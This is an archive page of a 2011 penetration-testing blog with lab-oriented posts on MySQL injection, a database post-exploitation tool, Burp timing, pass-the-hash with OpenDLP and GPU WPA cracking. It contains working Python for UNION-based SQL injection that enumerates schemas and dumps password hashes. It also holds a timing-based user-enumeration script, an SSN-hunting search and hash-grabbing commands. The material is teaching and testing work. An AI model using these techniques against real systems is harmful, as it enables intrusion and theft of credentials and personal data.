Friday, November 11, 2011

Web Hacking Video Series #4 MySQL Part 2 (Injection and Coding)

Video Lesson Topics:

  1. Setting up your victim application, databases and lab
  2. Attacking a simple injection with information_schema
  3. Automating your injections with Python and Beautiful Soup
  4. Dealing with various web encodings in Python and PHP
  5. Bypassing LOAD_FILE size restrictions and automating it
  6. Decrypting sensitive data via PHP and Python interactions
  7. As always me rambling about stupid nonsense :P FTW

Part 2 of the MySQL videos covers injecting a simple SQL injection example. It starts out slow, then combines techniques and moves into more advanced topics. Before attempting this lesson, make sure you have watched the videos in the previous blog post or understand both SQL and basic Python coding. I show how to automate the injection process in Python using the simple HTML processing abilities of Beautiful Soup, and cover several Python libraries for encoding data and calling web-based applications. I also talk about how to deal with encrypted data, and about methods of enumerating files and folders to find implementation issues and attack points for decrypting sensitive data through PHP/Python interaction with what is available on the server. This is the 2nd part of a 3-part series on MySQL for attacking web applications.
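The automation described above, written out as an added example (this is not the lab code from the video). It builds a UNION payload, URL-encodes it into the vulnerable parameter, fetches the page and pulls the injected rows back out of the HTML table. The lab's PHP page is emulated with an in-memory SQLite database so the script runs offline; the MySQL payloads in PAYLOADS are what you would send to the real lab, and a two-column product page keyed by an `id` parameter is an assumption about that lab. The video uses Beautiful Soup; the standard library's html.parser is used here instead so there is no dependency to install.

```python
"""
UNION-based injection automation: payload -> URL encoding -> fetch -> parse.
Added example, not the video's lab code.  The vulnerable page is a constructed
SQLite stand-in; PAYLOADS["mysql"] is what the real (MySQL) lab would get.
"""
import sqlite3
import urllib.parse
from html.parser import HTMLParser


def build_vulnerable_app():
    """Constructed stand-in for the lab page.  `id` is concatenated straight
    into the query on purpose: that is the bug being exploited."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE products(id INTEGER, name TEXT, price TEXT);
        INSERT INTO products VALUES (1,'widget','9.99'),(2,'gadget','19.99');
        CREATE TABLE users(id INTEGER, username TEXT, password TEXT);
        INSERT INTO users VALUES (1,'admin','5f4dcc3b5aa765d61d8327deb882cf99');
    """)

    def page(query_string):
        pid = urllib.parse.parse_qs(query_string).get("id", ["1"])[0]
        sql = "SELECT name, price FROM products WHERE id=" + pid   # injectable
        cells = "".join(f"<tr><td>{n}</td><td>{p}</td></tr>"
                        for n, p in db.execute(sql).fetchall())
        return f"<html><body><table>{cells}</table></body></html>"
    return page


class TableRows(HTMLParser):
    """Collect the text of each <td> per <tr> (what soup.find_all('tr') gives)."""
    def __init__(self):
        super().__init__()
        self.rows, self._row, self._cell = [], None, None

    def handle_starttag(self, tag, attrs):
        if tag == "tr":
            self._row = []
        elif tag == "td" and self._row is not None:
            self._cell = []

    def handle_data(self, data):
        if self._cell is not None:
            self._cell.append(data)

    def handle_endtag(self, tag):
        if tag == "td" and self._cell is not None:
            self._row.append("".join(self._cell).strip())
            self._cell = None
        elif tag == "tr" and self._row is not None:
            self.rows.append(tuple(self._row))
            self._row = None


def extract_rows(html):
    parser = TableRows()
    parser.feed(html)
    return parser.rows


# id=0 matches no real product, so only the UNION half lands in the table.
# The page prints two columns, so every payload selects exactly two.
PAYLOADS = {
    "mysql": {   # sent to the real lab: schema/table and column names from the catalog
        "tables":  "0 UNION SELECT table_schema, table_name FROM information_schema.tables",
        "columns": "0 UNION SELECT column_name, data_type FROM information_schema.columns "
                   "WHERE table_name='{table}'",
    },
    "sqlite": {  # the stand-in has no information_schema; same idea, different catalog
        "tables":  "0 UNION SELECT type, name FROM sqlite_master WHERE type='table'",
        "columns": "0 UNION SELECT name, type FROM pragma_table_info('{table}')",
    },
}


def inject(fetch, payload):
    """URL-encode the payload into the id parameter and parse the response."""
    return extract_rows(fetch("id=" + urllib.parse.quote(payload)))


def enumerate_tables(fetch, dbms):
    return [name for _, name in inject(fetch, PAYLOADS[dbms]["tables"])]


def enumerate_columns(fetch, dbms, table):
    return [col for col, _ in inject(fetch, PAYLOADS[dbms]["columns"].format(table=table))]


def dump(fetch, table, col_a, col_b):
    return inject(fetch, f"0 UNION SELECT {col_a}, {col_b} FROM {table}")


if __name__ == "__main__":
    app = build_vulnerable_app()   # against the lab, fetch with urllib.request instead
    for table in enumerate_tables(app, "sqlite"):
        print(table, enumerate_columns(app, "sqlite", table))
    print(dump(app, "users", "username", "password"))
```

Because UNION (as opposed to UNION ALL) deduplicates, the database is free to reorder the injected rows, so do not rely on the order in which tables come back. The `fetch` callable is the only thing to swap when pointing this at the lab: give it a function that performs the HTTP request and returns the body.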

Files Needed:
Lab Files

Video Lesson:

What's Next:
PHP source code analysis
Recoding PHP applications to fix SQLi

Friday, November 4, 2011

Web Hacking Video Series #3 MySQL Part 1 (SQL Primer)

Video Lesson Topics:
  1. Creating a SQL-cmdShell in python
  2. Setting up a SQL lab/learning environment
  3. Learning basic SQL queries
  4. More advanced queries for pulling meaningful data
  5. Interacting with the operating system
  6. Basic filter bypass and built-in encoding mechanisms
  7. MySQL specific functions and structure
This part of the series is a manual SQL/Python tutorial that shows the viewer how to create their own database interaction in Python; the audience is both hackers and new developers. After connecting to the database, you learn how to use that connection to pull meaningful data from a SQL database and to interact with the underlying operating system and DB functionality. I cover basic to more advanced SQL queries and interactions. None of the videos contain any injection whatsoever; instead they are a DB and SQL primer meant to build a foundation before you try to attack the unknown. I do delve into many topics related to injection and relate much of the material to injection, but everything is done on the command line in an interactive lab environment you create for yourself! The next blog post in the series will cover injection, followed by code analysis and recoding applications with parameterized queries. There will also be MSSQL-based material in the same sequence in future posts.
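A minimal SQL cmdShell of the kind Part 1.1 builds, added here as an example (it is not the video's code). It wraps any DB-API 2.0 connection, so the same loop drives MySQLdb or PyMySQL against the lab; below it is exercised against an in-memory SQLite database so it runs offline. The dialect-specific table listing query is the only part that knows which DBMS it is talking to; the filter of MySQL's built-in schemas in that query is my own choice, not a requirement.

```python
"""
Interactive SQL shell over a DB-API connection (added example).  Run it and
type SQL; `tables` lists tables via the dialect's catalog, `quit`/Ctrl-D exit.
"""
import cmd
import sqlite3

# Catalog query per dialect: MySQL's information_schema vs SQLite's sqlite_master.
TABLE_QUERY = {
    "mysql": ("SELECT table_schema, table_name FROM information_schema.tables "
              "WHERE table_schema NOT IN ('information_schema','mysql','performance_schema')"),
    "sqlite": "SELECT 'main', name FROM sqlite_master WHERE type='table'",
}


class SqlShell(cmd.Cmd):
    prompt = "sql> "

    def __init__(self, conn, dialect, stdout=None):
        super().__init__(stdout=stdout)
        self.conn = conn
        self.dialect = dialect
        self.last_rows = []        # rows returned by the most recent statement
        self.last_error = None     # DB error text from the most recent statement

    def default(self, line):
        """Anything that is not a shell command is sent to the database as-is."""
        self.last_rows, self.last_error = [], None
        cur = self.conn.cursor()
        try:
            cur.execute(line)
            # cursor.description is None for statements that return no rows
            self.last_rows = cur.fetchall() if cur.description else []
            self.conn.commit()
        except Exception as exc:   # sqlite3.Error and MySQLdb.Error both land here
            self.last_error = str(exc)
            print("ERROR:", exc, file=self.stdout)
            return
        for row in self.last_rows:
            print(" | ".join("NULL" if c is None else str(c) for c in row), file=self.stdout)
        print(f"{len(self.last_rows)} row(s)", file=self.stdout)

    def do_tables(self, line):
        """List tables using the current dialect's catalog query."""
        self.default(TABLE_QUERY[self.dialect])

    def do_quit(self, line):
        return True

    do_EOF = do_quit               # Ctrl-D also exits

    def emptyline(self):           # don't repeat the last statement on Enter
        pass


def demo_connection():
    """Constructed in-memory database standing in for the lab's MySQL server.
    For the lab you would instead use something like
    MySQLdb.connect(host=..., user=..., passwd=..., db=...)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("CREATE TABLE users(id INTEGER, name TEXT);"
                       "INSERT INTO users VALUES (1,'admin'),(2,'guest');")
    return conn


if __name__ == "__main__":
    SqlShell(demo_connection(), "sqlite").cmdloop("type SQL, 'tables', or 'quit'")
```

Keeping the last result set and error on the object (rather than only printing) is what makes the shell scriptable later: the same class can be driven from a loop with `onecmd()` when you move from poking at a database by hand to automating it.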

Needed To follow Along:
  • BT5 VM
  • Test Database
  • The Pillager: 
What's next:
MySQL Injection
MSSQL specific learning and Labs
Source Code analysis
Recoding your applications in PHP and ASP

Part 1.1 Coding your Python SQL cmdShell:

Part 1.2 Learning SQL:

Saturday, September 3, 2011

Database Pillager 0.5 Release (Video): Targeted data searches

Updated link + features 9/27/2011, after this initial post (new query command-line option "-q" drops you into a SQL shell, plus data formatting on display)
Example: python -a -d mysql -u root -p toor -q
Release 0.6: LINK:Download Pillager 0.6

I've been busy as hell lately, but I am working on a lot of SQL and web hacking stuff that I will release soon. Right now I am releasing the newest version of the Database Pillager. There are numerous new features, optimizations, future development that has been started, and some really cool stuff. Currently the newest features include:

New Features:
Database/Table Name targeted searches (done)
Targeted Data searches within columns (done)
Reporting Options (Partially done)
GUI (In development)
Universal SQL CMD shell (Done: mysql, mssql)
Also fixing a few more bugs related to MSSQL and Unicode

Video Contents:
The video below shows how to make the most of the tool, demonstrates the newest targeted data searches, and walks through some of the program structure so you can make simple modifications.

Untitled from ficti0n on Vimeo.

Commands used:

Simple Pillage:
python -a -d mysql -u root -p toor

Grab Hashes:
python -a -d mysql -u root -p toor --hashes

Database/Table Search based on a list:
python -a -d mysql -u root -p toor -n

Targeted Data Search based on keyword list:
python -a -d mysql -u root -p toor  -D

HIPAA Search Specifically:
python -a -d mysql -u root -p toor -s hipaa

Limiting data:
python -a -d mysql -u root -p toor  -s hipaa -l 1

Location of Lists:
inputFiles directory

Thursday, June 9, 2011

Burp Intruder Time fields

This is an update from the last video blog: 

I had an update submission from Toxic after watching Web Application video #2. Although module 4 was about learning how to code custom situations... Toxic noted that there are time fields within Burp Intruder, which you get by adding the columns:

-Response Received
-Response Completed

You get a number, in milliseconds, for how long the request took to complete... For example, the PHP code was originally set for a 2-second sleep() and so Jsmith had the following output:

Response Received: 2107

Now I upped the sleep function to 4 seconds and Jsmith has a new value of:

Response Received: 4001

I then upped the sleep function to 8 seconds and Jsmith has the new value of:
Response Received: 8002

Indicating that the field actually does keep track of the time between request and response... Just another option for anyone playing with time-based stuff in Burp.
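The same measurement from a script, so a custom Python loop (the kind video #2's module 4 is about) can do what the Response Received column does here. This is an added example, not code from either post. `probe` is a constructed stand-in for the lab's PHP page with its sleep() scaled down to 200 ms so the script runs offline; against the lab you would time a urllib.request call instead, and the usernames are made up.

```python
"""
Request timing for time-based tests (added example).  Only the account that
exists triggers the server-side sleep; the response body is identical either
way, so the elapsed time is the only tell.
"""
import statistics
import time

SLEEP_MS = 200   # the stand-in's sleep; the lab used 2, 4 and 8 seconds


def probe(username):
    """Constructed stand-in for the lab page: only 'jsmith' exists."""
    if username == "jsmith":
        time.sleep(SLEEP_MS / 1000)
    return "<html>Invalid login</html>"


def timed(fetch, payload):
    """Return (response, elapsed_ms): wall time from request to response,
    the number Burp shows under Response Received."""
    start = time.perf_counter()
    response = fetch(payload)
    return response, (time.perf_counter() - start) * 1000


def baseline_ms(fetch, benign, samples=3):
    """Median of several benign requests: the noise floor to compare against."""
    return statistics.median(timed(fetch, benign)[1] for _ in range(samples))


def is_delayed(fetch, payload, base_ms, expected_ms):
    """True if this request took at least half the injected delay longer than
    baseline.  Half the sleep is a margin that tolerates ordinary jitter without
    mistaking a slow-but-normal response for a triggered sleep; on a noisy
    link, raise the sleep rather than shrink the margin."""
    _, elapsed = timed(fetch, payload)
    return elapsed - base_ms >= expected_ms / 2


def enumerate_users(fetch, candidates, expected_ms=SLEEP_MS):
    """Return the candidates whose request was delayed: the accounts that exist."""
    base = baseline_ms(fetch, "does-not-exist")
    return [u for u in candidates if is_delayed(fetch, u, base, expected_ms)]


if __name__ == "__main__":
    print(enumerate_users(probe, ["nobody", "jsmith", "admin"]))
```

Taking a baseline first matters more than it looks: a 2-second sleep is easy to spot on a lab VM, but on a real engagement the benign round trip can itself vary by hundreds of milliseconds, which is why the comparison is against a median rather than a fixed cutoff.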


Wednesday, June 8, 2011

Web Hacking Video Series #2 Analysis of application behavior to bypass common implementation issues

Video Lesson Topics:  (Running time 50+ minutes)
This lesson covers the following topics:
  1. Analysis of application behavior to bypass common implementation issues
  2. Writing custom python code to deal with more complex testing situations
  3. More on burp suite intruder, comparer and scoping settings
  4. Introducing firebug for inspecting page elements
  5. Lots of me rambling about testing issues and real world considerations/client issues

New Hacking Lab:  (USE FIREFOX)
This is my second video on application security; it includes a lab of 6 different user enumeration situations. The point is not really user enumeration itself, but the various ways developers handle such situations and how we can find ways to bypass them. Everyone can follow along and play on the website as I ramble. I got bored Friday night and started coding, and ended up with the beginning of a mini web hacking lab that I may continue to grow for certain lessons, or I may allow downloading of the whole site when dealing with more dangerous topics I don't want to deploy online. Also note that I don't care about complying with Microsoft Internet Explorer's finicky page parsing issues, so use Firefox if you don't want viewing issues. ;)

Saturday, May 7, 2011

Web Hacking Video Series #1 Automating SQLi with Burp Extractor

After speaking with many penetration testers I have realized that web application hacking is a mystery to many testers who typically perform network-based penetration testing but have no prior development knowledge. This post is the first in a series of web hacking video training posts that will show various techniques that prove useful when you realize all avenues of attack run over HTTP-based protocols, which is typical on external tests.

Sunday, April 24, 2011

Immunity Canvas Code and CMDLine Walkthrough

This weekend was my first time playing around with Immunity Canvas. I noticed a lack of documentation for anything non-GUI related to the framework. Since I had such a hard time tracking down information, I decided to make a video showing basic Canvas command-line usage and tried to explain some module code based on my initial analysis. I hope it helps.

Wednesday, April 6, 2011

DbPillage Release 0.3

Database Pillager Release 0.3 
(A couple of new features and updates)

Quick announcement on the Database Pillager tool: I have added new features and updated many things. Below is some info and an example.

Updated Download Link: (0.6)

-Grabs database password hashes from each database type when -# or --hashes is used

-Implemented HIPAA searches for all kinds of data (I just searched the web for regexes :) haha; if you have more I will be happy to add them)

    * SSN
    * SSN with dashes
    * SSN with spaces
    * Carefirst ID
    * Dental procedure
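The shape of a targeted search like the HIPAA option above, written as an added example (this is not the Pillager's code): walk every table and column, run each value through a set of regexes, and cap hits per column the way a limit option would. The SSN regexes are the usual three shapes and are my own, not the tool's list; the database is a constructed in-memory SQLite stand-in (against MySQL you would enumerate columns from information_schema.columns and quote identifiers with backticks instead).

```python
"""
Regex-driven sensitive-data search across all tables and columns (added
example).  Hits are (table, column, pattern, value); `limit` caps hits per column.
"""
import re
import sqlite3

# Constructed patterns for the three SSN shapes listed in the post.
PATTERNS = {
    "ssn_dashes": re.compile(r"\b\d{3}-\d{2}-\d{4}\b"),
    "ssn_spaces": re.compile(r"\b\d{3} \d{2} \d{4}\b"),
    "ssn_plain":  re.compile(r"\b\d{9}\b"),   # noisy: any bare 9-digit number matches
}


def list_tables(conn):
    return [r[0] for r in conn.execute(
        "SELECT name FROM sqlite_master WHERE type='table' ORDER BY rowid")]


def list_columns(conn, table):
    return [r[1] for r in conn.execute(f'PRAGMA table_info("{table}")')]


def pillage(conn, patterns=PATTERNS, limit=None):
    """Return every matching cell as (table, column, pattern_label, value),
    stopping after `limit` hits in any one column when limit is set."""
    hits = []
    for table in list_tables(conn):
        for col in list_columns(conn, table):
            found = 0
            query = f'SELECT "{col}" FROM "{table}" WHERE "{col}" IS NOT NULL'
            for (value,) in conn.execute(query):
                text = str(value)               # numbers get matched as text too
                for label, rx in patterns.items():
                    if rx.search(text):
                        hits.append((table, col, label, text))
                        found += 1
                        break                   # one label per cell is enough
                if limit is not None and found >= limit:
                    break
    return hits


def build_sample_db():
    """Constructed data; the SSNs and account number are made up."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE patients(id INTEGER, name TEXT, ssn TEXT, notes TEXT);
        INSERT INTO patients VALUES
          (1,'A. Smith','123-45-6789','follow-up in 2 weeks'),
          (2,'B. Jones','987 65 4321','acct 123456789');
        CREATE TABLE products(id INTEGER, name TEXT, price TEXT);
        INSERT INTO products VALUES (1,'widget','9.99');
    """)
    return conn


if __name__ == "__main__":
    for hit in pillage(build_sample_db(), limit=1):
        print(hit)
```

The per-column limit is what keeps a search usable on a large database: one hit in a column is enough to prove the column holds the data, and dumping thousands of rows of it is both slow and more than you should be pulling off a client's system. The plain 9-digit pattern is included because real data is stored that way, but expect it to flag order numbers and the like; treat its hits as leads to verify rather than findings.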

Monday, March 28, 2011

The Database Pillager (tool release)

The Database Pillager
(Usage Tutorial, Tool Release 0.1)

I coded up a database pillaging tool for multiple database types, which can be downloaded below. I would host this tool on some kind of code hosting site, but they all seem to be a pain in my ass, so it will stay in zip format until I find one that isn't a pain to use or doesn't just display all of my personal data.

UPDATED DOWNLOAD LINK v0.6: (This post has also been updated for the new syntax; features have been added since this post was written, but the syntax shown here is current.)

Since I have yet to find a post-exploitation database tool that works well for me, I coded my own. This project was created to solve a recurring problem I have had searching for and retrieving PCI/HIPAA data after I have compromised the domain or obtained local database credentials and still need to prove that I have access to sensitive data. I have found this tool useful for many reasons, including finding session tokens, passwords and credit cards in databases. The Database Pillager (DBPillage) was created to fulfill the following goals and is still in active development by myself and other contributors.

Friday, February 4, 2011

OpenDLP Pass-The-Hash

OpenDLP is a great time-saving tool when looking for sensitive data on Windows machines, but one pain with using it is that it requires a username and password for the target machine. Passwords are not always a luxury provided when conducting a pentest, but password hashes are usually plentiful in a Windows environment, and the time to crack passwords is not always available. The details of obtaining Windows password hashes are out of scope for this guide; it is assumed the reader is familiar with "passing the hash". This guide also assumes that you have already patched your system's Samba install to allow passing the hash and have also patched "winexe"; further information about this can be found at the following page:

With that out of the way.....

The OpenDLP database needs to be modified to hold our hash. Whether you already have OpenDLP installed or are creating a new install, run the following command after the database has been set up (65 characters is exactly an LM:NT pair: two 32-character hex hashes plus the colon):

alter table profiles add column hash varchar(65);
Patching OpenDLP -

The provided patch targets OpenDLP 0.2.5; I cannot promise that it will work against any other version.

OpenDLP -

PTH-Patch - pth_mod.patch

If you are patching a new install, move "pth_mod.patch" into the OpenDLP directory (OpenDLP-0.2.5) and apply it:

tar -xjf OpenDLP-0.2.5.tar.bz2
mv pth_mod.patch OpenDLP-0.2.5
cd OpenDLP-0.2.5
patch -p1 -i pth_mod.patch
patching file OpenDLP/web/bin/control.html
patching file OpenDLP/web/bin/download_file.html
patching file OpenDLP/web/bin/profiles.html
patching file OpenDLP/web/bin/profiles-new.html
patching file OpenDLP/web/bin/results/results.html
patching file OpenDLP/web/bin/start-verify.html

If you are patching an existing install (OpenDLP-0.2.5), move "pth_mod.patch" into the directory where OpenDLP is installed (default: /var/www/localhost/OpenDLP/ ) and apply it; note the -p2 here, since the paths in the patch carry one extra leading directory compared to the fresh-install case:

mv pth_mod.patch /var/www/localhost/OpenDLP/
patch -p2 -i pth_mod.patch
patching file web/bin/control.html
patching file web/bin/download_file.html
patching file web/bin/profiles.html
patching file web/bin/profiles-new.html
patching file web/bin/results/results.html
patching file web/bin/start-verify.html

Confirm that your OpenDLP install is still working by accessing the application.

Create a new profile; as you can see, "SMBHash" is now an available option.

Enter your information; in my example I have entered a hash but no password.

Just to show, here is the database entry for this profile.

Create a new scan using our new profile.

View the scan results; in the following screenshot I have clicked on the flagged file and opened it in gedit.

Tuesday, January 18, 2011

WPA JTR/Pyrit/cowpatty uses and cracking interoperability

Below are a bunch of ways to interoperate between pyrit, cowpatty and JtR with various attacking and exporting techniques. I recently figured these out while having to juggle all kinds of cracking issues. A few weeks ago I was performing a wireless pentest and came across a rather standard WPA-PSK network. However, this came with issues that spawned learning a bunch of new command-line usages for various tools in conjunction with one another.

Wednesday, January 5, 2011

Setting up Pyrit on OSX with CUDA Support

A quick guide to getting pyrit installed and working on OS X with GPU (CUDA) support.

First download and install the CUDA drivers and CUDA SDK from NVIDIA.
Drivers -


Next you need to install Scapy.
Scapy requires a couple of libraries to be installed first: pylibpcap and libdnet.

Download and install libdnet and its Python bindings (libdnet is an autotools project, so configure and build it before installing):
tar -xzf libdnet-1.12.tgz
cd libdnet-1.12
./configure
make
sudo make install
cd python
sudo python setup.py install

Download and install pylibpcap:
tar -xzf pylibpcap-0.6.2.tar.gz
cd pylibpcap-0.6.2
sudo python setup.py install

Download and install Scapy:
tar -xzf scapy-latest.tar.gz
cd scapy-latest
sudo python setup.py install

Now that all the prerequisites are installed we can build and install Pyrit.

Download the latest pyrit from svn -
svn checkout pyrit-read-only

Build and install pyrit -
cd pyrit-read-only
cd pyrit
sudo python setup.py install

Build and install pyrit-cuda (LDFLAGS points the linker at the CUDA libraries installed by the NVIDIA package) -
cd pyrit-read-only
cd cpyrit_cuda
sudo LDFLAGS=-L/usr/local/cuda/lib python setup.py install

Now that Pyrit is installed, verify that CUDA support is working; a CUDA-Device entry should appear alongside the CPU cores -
pyrit list_cores
Pyrit 0.4.0-dev (svn r288) (C) 2008-2010 Lukas Lueg
This code is distributed under the GNU General Public License v3+

The following cores seem available...
#1: 'CUDA-Device #1 'GeForce GT 330M''
#2: 'CPU-Core (SSE2)'
#3: 'CPU-Core (SSE2)'
#4: 'CPU-Core (SSE2)'
#5: 'Network-Clients'